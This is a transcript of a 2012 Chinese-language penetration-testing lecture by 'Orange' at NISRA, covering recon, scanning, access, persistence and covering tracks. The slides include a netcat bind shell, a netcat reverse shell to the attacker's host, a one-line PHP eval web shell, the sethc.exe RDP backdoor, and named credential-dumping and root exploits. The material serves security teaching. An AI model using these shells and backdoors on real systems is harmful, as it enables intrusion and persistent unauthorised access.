滲透測試 talk @ nisra
DESCRIPTION
Orange @ NISRA 2012 / 05 / 22TRANSCRIPT
![Page 1: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/1.jpg)
滲 透 測 試Orange @ NISRA
2012 / 05 / 22
![Page 2: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/2.jpg)
目的
1. 以駭客、攻擊者的眼光、手法,對系統進行安全性測試
2. 我們都是好孩子,要經過授權唷! ^___^3. 基礎概念取向– 技術 Detail 不講– Web-based 自成一個章節不講
![Page 3: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/3.jpg)
不專業的人來講專業的東西 ...
![Page 4: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/4.jpg)
1. Reconnaissance2. Scanning3. Gaining Access4. Maintaining Access5. Clearing Tracks
說是這樣說拉,不過實際上 ...
![Page 5: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/5.jpg)
Reconnaissance
用盡一切方法拐到資訊1. Google # 想想人肉搜索2. Who.is3. DNS Zone transfer
目標是 ? 有沒有防火牆 ? IDS? WAF? 網路架構長怎樣 ? 網頁伺服器是不是 Virtual host ?
![Page 6: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/6.jpg)
資訊越多,入侵機會越多
服務越多,入侵機會越多
![Page 7: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/7.jpg)
Google://"mail.xxx.xxx.xx"
![Page 8: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/8.jpg)
http://whois.sc/
![Page 9: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/9.jpg)
Cont. 案例分享
• 利用 code.google.com 進行滲透測試。• 還記得上禮拜教的 Git 嗎?
![Page 10: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/10.jpg)
Scanning
1. 觀察、分析、思考。2. Scanning Port # Nmap
3. 弱點掃描 # Nessus, Metasploit# WebInspect, Acunetix
3. 猜密碼 # Hydra, Ncrack– 空密碼 , 123456, 帳密相同– 帳號永遠比密碼難猜
![Page 11: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/11.jpg)
Cont. 案例分享
• * 經典範例 *• RDP 後門– sethc.exe
• 連上遠端桌面第一件事不是打帳號,是快速按下 shift 五次!!
• 同理,看到登錄畫面第一件事是猜密碼、預設密碼。
![Page 12: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/12.jpg)
一般的應該像這樣
![Page 13: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/13.jpg)
不太正常的會長得像這樣
![Page 14: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/14.jpg)
比較有創意的會弄成這樣
![Page 15: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/15.jpg)
比較有點 Level 又會這樣做
![Page 16: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/16.jpg)
淡定低調風 ˊ _>ˋ
![Page 17: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/17.jpg)
Scanning port
• Port = 埠、端口、窗戶= 主機提供服務的窗口= 有機會入侵的地方
• 範圍從 1 到 65535• 21 = FTP• 23 = TELNET• 80 = WWW
![Page 18: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/18.jpg)
檢查窗戶有沒有開 ?
• telnet www.google.com 80• Netcat– nc www.google.com 80
![Page 19: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/19.jpg)
NetCat
http://sectools.org/
![Page 20: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/20.jpg)
折凳的奧妙之處,就是可以藏在民宅之中,隨手可得,還可以坐著它來隱藏殺機,打完更可以坐下休息,就算被條子抓到也告不了你,真不愧為七大武器之首!
![Page 21: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/21.jpg)
NetCat Usage
• nc apple.com 80 # 檢查 port 開啟是否• nc apple.com 1-100 # 一次掃描多個
port
• nc -v apple.com 80 # 詳細模式• nc -l -p 80 # 開 (listen) 一個
port
• nc -e cmd.exe -lp 80 # 將執行內容綁到連線上
![Page 22: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/22.jpg)
NetCat 可以幹嘛 ? (1/3)
• 範例主角 Cyndi & 大樹哥
• Cyndi 要看 大樹 的網頁伺服器開了沒 ?– Cyndi : nc 大樹 80
• Cyndi 要傳檔案給 大樹– 大樹 : nc -lp 12345 > a.zip– Cyndi : nc 大樹 12345 < a.zip
![Page 23: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/23.jpg)
NetCat 可以幹嘛 ? (2/3)
• Cyndi 入侵了 大樹 的電腦,想建個後門– Cyndi 在 大樹 的電腦執行 :– nc -lp 888 -e cmd.exe– Cyndi: nc 大樹 888 即可連上後門
888
![Page 24: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/24.jpg)
NetCat 可以幹嘛 ? (2/3)
• 大樹 裝了防火牆,又是在內網,怎麼辦 ?–動動腦,三秒鐘把後門改造成 反連後門
( Back connect)– Cyndi 執行 : nc -lp 888– Cyndi 在 大樹 電腦執行 :– nc -e cmd.exe Cyndi 888
888
![Page 25: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/25.jpg)
NMAP Usage
• http://nmap.org/– nmap -sT 127.0.0.1 # 起手式– nmap -sT -v 127.0.0.1 # 詳細模式– nmap -sT 127.0.0.1-254 # IP range
– nmap -sT -p 80 127.0.0.1 # 指定端口– nmap -sT -p 1-8 127.0.0.1 # Port
range– nmap -A 127.0.0.1 # 檢測作業系統
![Page 26: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/26.jpg)
實作
• 請用 nmap 找出 orangee.tw 開了網頁伺服器再奇怪的 port 上
![Page 27: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/27.jpg)
Gaining Access
1. 關鍵點,請善用盡上一步取得的資訊。2. 存取權限分為 Read Write eXecute3. 失敗請退回上一步。
• http://exploit-db.com/• Metasploit
![Page 28: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/28.jpg)
http://exploit-db.com/
![Page 29: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/29.jpg)
Cont. 案例分享
• CVE-2012-1823– PHP CGI Argument Injection
• 為啥講它 ?
![Page 30: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/30.jpg)
http://ww.facebook.com/?-s
![Page 31: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/31.jpg)
Reconnaissance
![Page 32: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/32.jpg)
Scanning
![Page 33: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/33.jpg)
Gaining Access
<?php @eval($_POST[cmd]); ?>
![Page 34: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/34.jpg)
Metasploit (1/2)
![Page 35: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/35.jpg)
Metasploit (2/2)
• Exploits• Auxiliary• Payload
![Page 36: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/36.jpg)
實作 ( 有時間的話 )
1. 使用 nmap 發現有開 FTP 服務2. 使用 nc 連接發現 FTP 是由 vsftp 架設並且版本是 2.3.4
3. 透過 exploit-db 搜尋發現 vsftp 2.3.4 存在 backdoor !!
4. 使用 Metasploit 進行攻擊– unix -> ftp -> vsftpd234 backdoor
![Page 37: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/37.jpg)
Maintaining Access
1. 普通使用者 vs. 最強使用者2. 提權 ( Privilege Escalation )3. 翻屍體4. 如何想來就來想走就走!– 後門 Backdoor– 木馬 Trojan– 乳器 Rootkit
![Page 38: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/38.jpg)
實作 ( 詳細指令在 txt 裡 )
1. Mimikatz–原理會提一下,不懂就算了 XD
2. Enlightenment.tgz– 懶人包
3. Mempodipper.c– 原理聽聽就算了 XD
![Page 39: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/39.jpg)
![Page 40: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/40.jpg)
![Page 41: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/41.jpg)
![Page 42: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/42.jpg)
Clearing Tracks
1. 俗稱的擦屁屁2. 任何動作都會留下紀錄3. 壞事不要幹,要幹就要懂的保護自己
舉例:
![Page 43: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/43.jpg)
傻傻的• 保護當事人,徹圖
![Page 44: 滲透測試 Talk @ Nisra](https://reader036.vdocuments.pub/reader036/viewer/2022081414/54c5a6314a7959773c8b45c5/html5/thumbnails/44.jpg)
安全的本質是什麼 ?
http://hi.baidu.com/yuange1975/blog